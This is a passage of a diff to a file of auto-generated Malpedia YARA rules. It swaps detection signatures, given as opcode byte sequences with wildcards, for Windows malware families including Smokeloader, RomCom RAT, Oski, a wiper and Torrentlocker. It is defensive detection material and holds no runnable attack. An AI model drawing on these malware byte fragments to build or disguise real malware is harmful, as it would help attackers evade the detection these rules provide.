+		logic_hash = "eb81523b23e33f9ac426471f12cb50726588d21942b2b73e8ff2883c6fa0b314"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120535,40 +120608,34 @@ rule MALPEDIA_Win_Photolite_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4883f905 72e4 889db4010000 ba7e32f11a c785b801000035578374 }
-		$sequence_1 = { 4803cf 493bce 72e8 889d2c010000 c78530010000d857fc49 }
-		$sequence_2 = { c785e4020000b434516d c785e8020000813e467c c785ec02000097355758 c785f00200008022253d }
-		$sequence_3 = { 4c897020 55 488da858f9ffff 4881eca0070000 33db }
-		$sequence_4 = { c78568040000bb4e5450 c7856c040000a94d1c35 8b8560040000 8a855c040000 }
-		$sequence_5 = { c78530060000a8eeaa04 c78534060000a8fbc56a 8b8520060000 8a851c060000 }
-		$sequence_6 = { 72e8 889dd0030000 baff978142 c785d403000094f2f32c c785d80300009afbb270 c785dc030000d1f3ed2e }
-		$sequence_7 = { c74548ba572c54 8b4540 8a453c 84c0 7518 }
-		$sequence_8 = { 4885c0 0f8419010000 488b15???????? 4885d2 7517 ba01000000 33c9 }
-		$sequence_9 = { 488bcb 0f1f4000 66660f1f840000000000 8b448c24 35e6845659 }
-		$sequence_10 = { 41b8956927f2 e8???????? 488d4dd0 ffd0 b001 }
-		$sequence_11 = { 0f114020 0f104a30 0f114830 488b05???????? }
-		$sequence_12 = { 488d4c2430 41ffd0 85c0 7527 8b442420 2b442428 03442424 }
-		$sequence_13 = { 488d85a0010000 448838 488d4001 4883eb01 75f3 41b001 488d8da0010000 }
-		$sequence_14 = { 4d8d0480 0fb602 83e107 410200 41320429 }
-		$sequence_15 = { e8???????? b9100e0000 ffd0 488d95f0030000 4489bdf0030000 488d0d72aaffff e8???????? }
+		$sequence_0 = { 7203 488b01 488d0c10 488bfe 492bf9 4c8bc7 }
+		$sequence_1 = { 488bcd e8???????? 498d5701 41c6042c00 4881fa00100000 7218 }
+		$sequence_2 = { e8???????? 4c8b5368 488d4d2f 48837d4710 0f93c2 480f434d2f 4c8b4d3f }
+		$sequence_3 = { 3bc7 0f843e010000 0fb6f8 e9???????? 0f57c0 }
+		$sequence_4 = { 7453 488b5318 4883fa10 7205 488b0b }
+		$sequence_5 = { 0bc1 89442408 0fae542408 c3 488bc4 53 }
+		$sequence_6 = { 747e 8b82b0000000 4803c8 4903c9 4a8d1408 }
+		$sequence_7 = { 4883781810 7203 488b00 41b80a000000 488bd0 488bcf e8???????? }
+		$sequence_8 = { eb2c 498bcf 488bc3 48d1e9 }
+		$sequence_9 = { 48895c2408 4889742410 48897c2418 488bd9 4c8bc9 482b5a30 }
 
 	condition:
-		7 of them and filesize < 99328
+		7 of them and filesize < 635904
 }
-rule MALPEDIA_Win_Smokeloader_Auto : FILE
+rule MALPEDIA_Win_Runningrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "112e04c3-8f0e-5c11-855c-ae74057a323a"
+		id = "d7ed2390-7d31-581c-a1e4-fdb77337ca48"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.smokeloader_auto.yar#L1-L575"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.runningrat_auto.yar#L1-L165"
 		license_url = "N/A"
-		logic_hash = "527784088a3890e68087680c97defe31324facf44f4c2545f19c39a5e952f5fd"
+		logic_hash = "4ddbc260dd07c2863631004b7f152c53ea1c57a6d19004876f01cbe090f0559f"
 		score = 75
-		quality = 44
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -120580,87 +120647,37 @@ rule MALPEDIA_Win_Smokeloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8d45f0 50 8d45e8 50 8d45e0 50 }
-		$sequence_1 = { 50 6a00 53 ff15???????? 8d45f0 50 }
-		$sequence_2 = { ff15???????? 8bf0 8d45dc 50 6a00 53 }
-		$sequence_3 = { 57 ff15???????? 6a00 6800000002 6a03 }
-		$sequence_4 = { 50 8d45e0 50 56 ff15???????? 56 ff15???????? }
-		$sequence_5 = { 740a 83c104 83f920 72f0 }
-		$sequence_6 = { e8???????? 8bf0 8d45fc 50 ff75fc 56 6a19 }
-		$sequence_7 = { 0fb64405dc 50 8d45ec 50 }
-		$sequence_8 = { 50 56 681f000f00 57 }
-		$sequence_9 = { ff15???????? bf90010000 8bcf e8???????? }
-		$sequence_10 = { 56 8d45fc 50 57 57 6a19 ff75f8 }
-		$sequence_11 = { 6800a00f00 50 a3???????? ff15???????? }
-		$sequence_12 = { 7507 33c0 e9???????? e8???????? b904010000 }
-		$sequence_13 = { 668ce8 6685c0 7406 fe05???????? }
-		$sequence_14 = { 56 ff15???????? 50 56 6a00 ff15???????? }
-		$sequence_15 = { 8b07 03c3 50 ff15???????? }
-		$sequence_16 = { 03c8 81e1ff000000 8a440c18 30042b 43 3b9c241c010000 }
-		$sequence_17 = { 8bc3 c745ec25303258 885df0 8945fc }
-		$sequence_18 = { ffb43108010000 8b84310c010000 03c7 50 8b843104010000 03c5 }
-		$sequence_19 = { 50 53 e8???????? 8d8decfdffff 8d95f0fdffff c70200000000 6800800000 }
-		$sequence_20 = { 8db5f8fdffff c60653 56 6a00 }
-		$sequence_21 = { 8985ecfdffff ffb5f0fdffff 50 53 }
-		$sequence_22 = { 8d85f0fdffff 8b750c 8b7d10 50 57 56 }
-		$sequence_23 = { 89c6 6804010000 56 57 }
-		$sequence_24 = { 31c0 66894603 8d8de8fdffff 50 50 }
-		$sequence_25 = { 50 50 50 51 50 50 56 }
-		$sequence_26 = { e8???????? 2500300038 005800 2500300038 }
-		$sequence_27 = { fc 5f 5e 5b }
-		$sequence_28 = { 89c6 89cf fc b280 31db a4 }
-		$sequence_29 = { 30d0 aa e2f3 7505 }
-		$sequence_30 = { 89e5 81ec5c060000 53 56 }
-		$sequence_31 = { 01c2 31c0 ac 01c2 }
-		$sequence_32 = { e8???????? 41b919000200 4533c0 4c8bf0 488d4540 }
-		$sequence_33 = { 4c8d4580 488b01 33d2 ff5060 }
-		$sequence_34 = { 48895c2418 48897c2420 89542410 55 488bec 4883ec60 488bf9 }
-		$sequence_35 = { 8b7b24 4c 01c7 668b0c4f 41 8b7b1c 4c }
-		$sequence_36 = { ac 01c2 85c0 75f0 }
-		$sequence_37 = { 4885c0 7428 80383c 7423 }
-		$sequence_38 = { 55 89e5 81ec54040000 53 }
-		$sequence_39 = { 4f 8d1c10 41 8b4b18 45 8b6320 4d }
-		$sequence_40 = { eb08 4863433c 8b7c1828 488bcb e8???????? 4863d7 498bcc }
-		$sequence_41 = { 4c 01c7 8b048f 4c }
-		$sequence_42 = { 8b6320 4d 01c4 ffc9 49 8d3c8c }
-		$sequence_43 = { 8b957cffffff 895164 6814318b23 8b45e4 50 }
-		$sequence_44 = { 895118 8b4584 8b4db8 89481c 8b5584 8b45b4 }
-		$sequence_45 = { 688dbdc13f 8b45e4 50 e8???????? 8945d8 8b4da0 }
-		$sequence_46 = { 56 57 007508 bbb84340c1 4a }
-		$sequence_47 = { 50 8b4dfc 51 e8???????? 85c0 7589 8b55fc }
-		$sequence_48 = { c1e002 03471c 8b0428 01e8 5e c3 }
-		$sequence_49 = { 56 89c2 8b453c 8b7c2878 }
-		$sequence_50 = { aa e2f3 7506 7404 }
-		$sequence_51 = { 894ddc c745e000000000 8b55e4 3b55dc 0f8327010000 c745e801000000 }
-		$sequence_52 = { 5b c9 c20800 55 89e5 83ec04 }
-		$sequence_53 = { 8945cc 8b4da0 8b55cc 895144 68d770a437 }
-		$sequence_54 = { 58 29c6 d1ee 037724 0fb7442efe c1e002 03471c }
-		$sequence_55 = { c1c108 3208 40 803800 75f5 31d1 }
-		$sequence_56 = { 6bc963 8b4508 33d2 f7f1 }
-		$sequence_57 = { 8946fc ad 85c0 75f3 c3 56 }
-		$sequence_58 = { 8b45e4 50 e8???????? 89459c 8b4da0 8b559c 895158 }
-		$sequence_59 = { 8b7c2878 01ef 8b7720 01ee 56 ad 01e8 }
-		$sequence_60 = { 5d 5d 2e3f 3438 }
-		$sequence_61 = { 9d d418 a1???????? 0da20e09d8 }
-		$sequence_62 = { b0b6 49 92 06 4e 55 }
-		$sequence_63 = { 00556c 9d d418 a9d61049d4 5c d6 2851d6 }
-		$sequence_64 = { 5d 5d 5d 5d 285b29 59 }
+		$sequence_0 = { 56 ff15???????? 56 ff15???????? 8b8c2418010000 }
+		$sequence_1 = { 891481 ff4608 e9???????? 83fa12 750a c744242c07000000 eb07 }
+		$sequence_2 = { 5d 83c408 c3 8b442434 8b4c242c 56 }
+		$sequence_3 = { dec1 dee9 def9 dc0d???????? }
+		$sequence_4 = { 50 03cb 51 e8???????? 8b542428 0fb74206 47 }
+		$sequence_5 = { f3a4 ff15???????? 5f 5e 5d 33c0 }
+		$sequence_6 = { 8b4764 50 e8???????? 33c0 83c404 8bcf 894764 }
+		$sequence_7 = { 03c8 40 8a0c29 884c03ff 8b4e04 }
+		$sequence_8 = { 8be8 83c404 83fdfd 7515 }
+		$sequence_9 = { 8dbc24a4010000 f3ab 8d8c2408020000 51 }
+		$sequence_10 = { 83c204 89542420 3bce 741f 8b948c8c000000 8b9c242c010000 }
+		$sequence_11 = { 6a00 6a00 8b82a8000000 50 68???????? 6a00 }
+		$sequence_12 = { 50 e8???????? 8b5644 68a2aedeac 68ce9a32f7 68c9600000 52 }
+		$sequence_13 = { 7336 8d642400 837c241c00 0f84cc020000 0fb613 ff4c241c }
+		$sequence_14 = { 8bd1 83e201 d1e9 895618 83f903 0f8761060000 }
 
 	condition:
-		7 of them and filesize < 245760
+		7 of them and filesize < 275456
 }
-rule MALPEDIA_Win_Lightneuron_Auto : FILE
+rule MALPEDIA_Win_Newposthings_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "effcdfe2-a4bd-534e-86eb-84be08a02b5f"
+		id = "c55cf5a4-9d2e-5a13-be84-37c432415503"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightneuron"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lightneuron_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.newposthings_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "6ad51552136a32b2e5f3fef922b412240ca64bebb497b163d34faf6af2a9c320"
+		logic_hash = "13f1fe8829e7836205b87c0389095410b0edec07cc2b8983a118dc935e06f45f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120674,32 +120691,32 @@ rule MALPEDIA_Win_Lightneuron_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b0d???????? 4885d2 480f45ca ff15???????? 488b4b08 8d5001 e8???????? }
-		$sequence_1 = { 448830 e8???????? 85c0 744e 488bcb e8???????? 41ffc4 }
-		$sequence_2 = { 488bd3 4c0f45c8 488b05???????? 488bcf 4885c0 4c0f45c0 e8???????? }
-		$sequence_3 = { c744244801000000 85ff 0f8598080000 488b8c24d8000000 4883f901 7304 33c0 }
-		$sequence_4 = { 2bd8 78ef 4863db 488bd5 4803de 488bcb }
-		$sequence_5 = { e8???????? 488bc7 41be01000000 458d4603 33d2 488bcf 4c89742470 }
-		$sequence_6 = { 4883ec38 488b4c2440 ff15???????? 89442420 837c2420ff 7507 }
-		$sequence_7 = { 4885ed 7437 4885c0 7432 488d7501 483bf0 7729 }
-		$sequence_8 = { 0fb6c8 410fb6c1 339c8dc0e90300 339c8580d50300 418bc1 41c1e910 41335d04 }
-		$sequence_9 = { 4c89742428 4489742420 e8???????? 418bee 488b05???????? 488b15???????? }
+		$sequence_0 = { 83ec0c 8b4508 8b483c 01c1 813950450000 7551 8d5178 }
+		$sequence_1 = { 68ae520110 64a100000000 50 81ec28010000 a1???????? 33c5 }
+		$sequence_2 = { 8d85f0fcffff 50 6801010000 6a00 c785ecfcffff00000000 }
+		$sequence_3 = { ff750c e8???????? 83c404 c745200f000000 c7451c00000000 c6450c00 b801000000 }
+		$sequence_4 = { 8bce e8???????? c745fcffffffff ff36 e8???????? 83c404 8b4df4 }
+		$sequence_5 = { 833cf5c000021000 7513 56 e8???????? }
+		$sequence_6 = { 57 a1???????? 33c4 50 8d442420 64a300000000 68f0110210 }
+		$sequence_7 = { c68518ffffff00 c645fc10 837d9010 720e ffb57cffffff }
+		$sequence_8 = { 0fb6bc3890b70110 8bc7 c1e804 89bdc4fdffff 8bbde8fdffff 8985c4fdffff }
+		$sequence_9 = { 83c40c 8d842474040000 6890010000 50 6a00 ff15???????? }
 
 	condition:
-		7 of them and filesize < 573440
+		7 of them and filesize < 827392
 }
-rule MALPEDIA_Win_Darkvision_Rat_Auto : FILE
+rule MALPEDIA_Win_Boxcaon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1a6f6701-70b7-5c48-928b-485642438bd0"
+		id = "a730ae2b-b623-5088-86a7-4d1a4eb89ea5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvision_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkvision_rat_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boxcaon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.boxcaon_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "ea735f4eeed059962dba8005baff4c34c6d0e6dbba61d43d1f0324dec9b20b8d"
+		logic_hash = "5b71da83cc61472fd3b6239fea0178674ab4b3cf9a9678dbeeda07cdd88e683a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120713,32 +120730,32 @@ rule MALPEDIA_Win_Darkvision_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb0a 8b44243c ffc0 8944243c 837c243c64 }
-		$sequence_1 = { 85c0 7523 488d15da6b0300 488b8c2460030000 ff15???????? 488b8c2460030000 ff15???????? }
-		$sequence_2 = { ff15???????? 488b8c2468030000 ff15???????? 41b838000000 33d2 488d8c2428030000 e8???????? }
-		$sequence_3 = { 488d0d9efe0100 48837c010800 7432 4863442424 4869c0040b0000 488d0d83fe0100 66ba6600 }
-		$sequence_4 = { 741d 488b4c2438 ff15???????? 488b4c2430 ff15???????? 33c0 }
-		$sequence_5 = { 4c8d0505910100 baff7f0000 488b4c2440 ff15???????? 4c8d0deaf40200 4c8d05ff900100 baff7f0000 }
-		$sequence_6 = { baffffffff 488b4c0110 ff15???????? 4863442424 486bc028 488d0d71550200 48837c010800 }
-		$sequence_7 = { ff15???????? 4885c0 0f847a010000 488bc8 ff15???????? 488d15e0620000 488bce }
-		$sequence_8 = { 488b4c2430 4803c8 488bc1 4889442470 c744247c00000000 eb0a }
-		$sequence_9 = { ba7c040000 b940000000 ff15???????? 4889442428 48837c242800 0f8477020000 4c8b442428 }
+		$sequence_0 = { 897e14 897e70 c686c800000043 c6864b01000043 c7466890b54000 6a0d e8???????? }
+		$sequence_1 = { 8bd3 66899424e0000000 5a 6a50 66899424e2000000 8bd1 66899424e4000000 }
+		$sequence_2 = { 8888b8b84000 40 ebe6 ff35???????? }
+		$sequence_3 = { 8bec 33c0 8b4d08 3b0cc5408a4000 740a }
+		$sequence_4 = { c78424980000003c000000 ff15???????? 56 33ff }
+		$sequence_5 = { e8???????? 84c0 741a 8d4c2410 8d8424d8020000 2bc1 }
+		$sequence_6 = { 89bc24ac000000 89b424b4000000 c78424980000003c000000 ff15???????? }
+		$sequence_7 = { 33c9 66890c06 68???????? 8d442414 50 e8???????? }
+		$sequence_8 = { 0020 1f 40 00441f40 0023 d18a0688078a 46 }
+		$sequence_9 = { 33c0 c7461407000000 668906 8b4508 8b5810 57 }
 
 	condition:
-		7 of them and filesize < 618496
+		7 of them and filesize < 256000
 }
-rule MALPEDIA_Win_Slowstepper_Auto : FILE
+rule MALPEDIA_Win_Oski_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "83f15ae7-3874-55c6-9009-11d19ac08b8c"
+		id = "5c71af2a-ab1c-54b1-b031-9d62fe7b8e58"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slowstepper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.slowstepper_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oski"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.oski_auto.yar#L1-L184"
 		license_url = "N/A"
-		logic_hash = "dd0e842f62bc92cdd486a9615b960e4b584259d9116f2837f2c07d72a5000be5"
+		logic_hash = "6e592abd5f7946bd0b6a43d8ee0af2b699a6055e4a91c9728a4df01ede6824ac"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120752,32 +120769,39 @@ rule MALPEDIA_Win_Slowstepper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a04 43 53 50 8945d4 8975e0 8975dc }
-		$sequence_1 = { e8???????? b001 e8???????? c3 68a4020000 b8???????? e8???????? }
-		$sequence_2 = { 83661000 83c414 8d45b8 c746140f000000 50 8bce c60600 }
-		$sequence_3 = { c645fc4c e8???????? 57 c645fc4b 56 8d8dcceeffff e8???????? }
-		$sequence_4 = { 85c0 746b 395c241c 765e 53 ff742420 8d8c2474050000 }
-		$sequence_5 = { 59 85c0 7507 c605????????01 68???????? 8d9564ebffff 8bce }
-		$sequence_6 = { 57 8d4db8 e9???????? 6a48 b8???????? e8???????? 8b4508 }
-		$sequence_7 = { 8b8d70faffff 8d85ecfaffff 50 8d85ecfeffff 50 e8???????? 59 }
-		$sequence_8 = { ff6008 55 8bec 8b4904 8b01 5d ff600c }
-		$sequence_9 = { 6bc00c 8d8405b8feffff 8d8da8feffff 3bc1 7422 8b08 8b95a8feffff }
+		$sequence_0 = { 50 a1???????? 50 8d8df0feffff 51 e8???????? }
+		$sequence_1 = { 25ff7f0000 c3 8bff 55 8bec 83ec14 ff7510 }
+		$sequence_2 = { 83c40c e8???????? 50 a1???????? 50 }
+		$sequence_3 = { 8975f0 e8???????? cc 8bff 55 8bec 8b550c }
+		$sequence_4 = { 393d???????? 0f94c0 33d2 0bc8 }
+		$sequence_5 = { 57 e8???????? 8b4618 83c40c 6a00 6a00 }
+		$sequence_6 = { 56 8d85ecfeffff 50 8d8dd0fcffff 51 eb18 f685a4fcffff10 }
+		$sequence_7 = { 8b4508 8945b0 8b450c 33db 8bc8 }
+		$sequence_8 = { f3c3 e9???????? 8bff 55 8bec 83ec1c a1???????? }
+		$sequence_9 = { ebe9 6a02 e8???????? 59 c3 e8???????? }
+		$sequence_10 = { 8b5508 52 a1???????? 50 8d8de8fdffff }
+		$sequence_11 = { 51 e8???????? 83c40c 8985e4fdffff 83bde4fdffff00 }
+		$sequence_12 = { e8???????? 83c404 8b0d???????? 51 ff15???????? a3???????? }
+		$sequence_13 = { 8b511c 83c220 52 6a00 }
+		$sequence_14 = { 52 6a00 68???????? ff15???????? 8945f0 837df000 }
+		$sequence_15 = { 83c404 8b55f8 8955f4 8b45f4 50 e8???????? 83c404 }
+		$sequence_16 = { 51 6800020000 8b55f4 52 ff15???????? 8945f0 }
 
 	condition:
-		7 of them and filesize < 909312
+		7 of them and filesize < 423936
 }
-rule MALPEDIA_Win_Bruh_Wiper_Auto : FILE
+rule MALPEDIA_Win_Stinger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7c9ba4ef-4fa1-51f0-9221-ba77db229e60"
+		id = "3d5345cc-6891-5cd1-840e-a83631b5fe99"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bruh_wiper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bruh_wiper_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stinger_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "cbaff4d5b7b91bf6e756e6a62487e97a100f6bd9c2c8d699efaa34252266d183"
+		logic_hash = "89238eb5fdfe99680f7f49528afc66652f68e02cb4c9414363e841a63c1fb66a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120791,32 +120815,32 @@ rule MALPEDIA_Win_Bruh_Wiper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a03 6800000040 68???????? ff15???????? 8b1d???????? 8bf8 6a00 }
-		$sequence_1 = { e8???????? 83c40c be01080000 0f1f8000000000 6a00 8d85f8fdffff }
-		$sequence_2 = { ffd3 83ee01 75e3 8b4dfc 5f 5e }
-		$sequence_3 = { ffd7 8d45f0 50 6a06 6a00 6a00 6a00 }
-		$sequence_4 = { 66a1???????? 668945f4 a0???????? 56 8845f6 8d45f4 57 }
-		$sequence_5 = { 57 ffd3 83ee01 75e3 8b4dfc 5f }
-		$sequence_6 = { 50 6a00 6a01 6a13 ffd7 8d45f0 }
-		$sequence_7 = { 57 ffd3 6800020000 8d85fcfdffff 6a00 50 e8???????? }
-		$sequence_8 = { 83ec10 a1???????? 33c5 8945fc 66a1???????? 668945f4 }
-		$sequence_9 = { 57 ffd3 83ee01 75e3 }
+		$sequence_0 = { 83c404 8b5dfc 53 83c324 53 8b1b }
+		$sequence_1 = { 85db 7409 53 e8???????? 83c404 ff75f0 ff75f4 }
+		$sequence_2 = { 83f90a 1bd2 83d100 c1e008 8d4cd137 0bc1 }
+		$sequence_3 = { 8b5dfc 83c320 895df8 8b5df8 }
+		$sequence_4 = { 83f800 0f84e6030000 ff75fc 8b5d08 ff33 b902000000 e8???????? }
+		$sequence_5 = { ff35???????? ff35???????? b903000000 e8???????? 83c40c 8945c4 6805000080 }
+		$sequence_6 = { 51 53 890b 50 3bc8 0f8f56030000 }
+		$sequence_7 = { 8b5dfc 83c314 895df8 8965f4 6800000000 ff15???????? 90 }
+		$sequence_8 = { 8a143a 8a0c30 32ca 5a 880c10 }
+		$sequence_9 = { 8b5df8 8b7df4 85db 8b75fc 7436 0fb606 8bc8 }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 197096
 }
-rule MALPEDIA_Win_Xsplus_Auto : FILE
+rule MALPEDIA_Win_Romcom_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5e1cc002-aafa-57a5-ac8f-12fca4d9f30a"
+		id = "52944eb3-a8b3-598a-bd5c-c9c0b8dd95ba"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xsplus_auto.yar#L1-L182"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.romcom_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.romcom_rat_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "dcc5687f917495ecca687c74006688a8948f135325a7531bf3c5206fe8cc2299"
+		logic_hash = "94e8976d75fd26e2288ab3e032c369598bcb0480813fc775078fe15324b5e802"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120830,39 +120854,32 @@ rule MALPEDIA_Win_Xsplus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b761c 8b4608 8b7e20 8b36 66394f18 75f2 }
-		$sequence_1 = { 8bec 83ec18 8b4518 8945f0 8b4d14 }
-		$sequence_2 = { 8b55ec 8b01 3b4210 0f83af000000 6a01 8d4df8 51 }
-		$sequence_3 = { 8b5520 8955f8 8b451c 8945e8 8b4d10 83e102 85c9 }
-		$sequence_4 = { 83c201 8955f8 8b4514 8945f4 }
-		$sequence_5 = { aa a0???????? 8885c8fbffff b940000000 33c0 8dbdc9fbffff }
-		$sequence_6 = { 85c0 7524 a1???????? a3???????? a1???????? c705????????04264000 8935???????? }
-		$sequence_7 = { 8b8db4fdffff 81e9cd860100 898db4fdffff 83bdb4fdffff03 }
-		$sequence_8 = { 898da8feffff 8b95a8feffff 52 8b85ccfeffff 50 8d4de0 }
-		$sequence_9 = { 6804010000 8d85fcfeffff 50 6a00 ff15???????? 6804010000 8d8df0fcffff }
-		$sequence_10 = { 8985b8fdffff 81bdb8fdffff10010000 7723 81bdb8fdffff10010000 }
-		$sequence_11 = { 8b5508 89510c 8b45ec 8b4d0c 894808 8b55ec c7421000000000 }
-		$sequence_12 = { c74668e0a34000 6a0d e8???????? 59 8365fc00 ff7668 ff15???????? }
-		$sequence_13 = { 8d85d0fcffff 50 8d8dc8fbffff 51 e8???????? }
-		$sequence_14 = { 0355fc 0fb602 33c1 8b4d0c 034dfc 8801 }
-		$sequence_15 = { 8a8c181d010000 888808a74000 40 ebe6 }
-		$sequence_16 = { 50 ff15???????? b801000000 e9???????? 8d95c4fdffff }
+		$sequence_0 = { 33d2 448d4240 488d8d60100000 e8???????? 488d0d9a6e0100 e8???????? 4c8bc0 }
+		$sequence_1 = { 488945a0 488d0592d20400 4885db 7424 83630800 488903 }
+		$sequence_2 = { c7442434323b3831 c74424383738363a c744243c02005b00 c74424407e006900 c744244461005d00 c74424485e005200 c744244c52005400 }
+		$sequence_3 = { f30f7f458f 482bf3 4889742420 4c8d458f 488d55a7 498bce e8???????? }
+		$sequence_4 = { 488d8a50000000 e9???????? 4055 4883ec20 488bea 8b8598000000 83e002 }
+		$sequence_5 = { eb24 488d152e6b0600 488d4b02 483bce 7714 41803c1f30 750d }
+		$sequence_6 = { c7442460474e595a c7442464080a5d0d c74424685b5a4659 c744246c10475f51 c7442470141e5e19 c74424744b4b5f4f c744247848262600 }
+		$sequence_7 = { 498bd6 498bcd ff5038 498b4740 488b4808 48894d97 488b01 }
+		$sequence_8 = { ebd7 488d053e4d0300 ba80000000 0f1000 410f1106 0f104810 410f114e10 }
+		$sequence_9 = { 894c2420 ff15???????? eb0c 48630d???????? e8???????? }
 
 	condition:
-		7 of them and filesize < 597872
+		7 of them and filesize < 1211392
 }
-rule MALPEDIA_Win_Kuaibu8_Auto : FILE
+rule MALPEDIA_Win_Torrentlocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "755c9fef-12d3-5450-97c1-5338be93504a"
+		id = "7392e065-18c2-5313-a3d1-b30d3efcbeb2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kuaibu8_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.torrentlocker_auto.yar#L1-L169"
 		license_url = "N/A"
-		logic_hash = "fc318523e53f24e8818ee766d5be4e6f49732099f739761d424c7624b095d7ec"
+		logic_hash = "9e477f7e8b8247df899448f8dfaacbe7088b9d7adf1371f318f6d0bbdd12c5e7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120876,32 +120893,38 @@ rule MALPEDIA_Win_Kuaibu8_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff35???????? b902000000 e8???????? 83c408 8945e0 8b45e0 50 }
-		$sequence_1 = { 83c404 c1e002 03d8 895db4 8b5de8 e8???????? b804000000 }
-		$sequence_2 = { 6a10 52 56 6689442416 e8???????? }
-		$sequence_3 = { 7409 53 e8???????? 83c404 8b5de8 e8???????? }
-		$sequence_4 = { 895dbc e8???????? 894db8 8b7dbc c70701000000 83c704 8bc1 }
-		$sequence_5 = { 83c404 58 8945f4 8965ec 8d45f0 50 8b45f4 }
-		$sequence_6 = { 83f800 0f851e000000 b8???????? 50 8b5d10 8b1b }
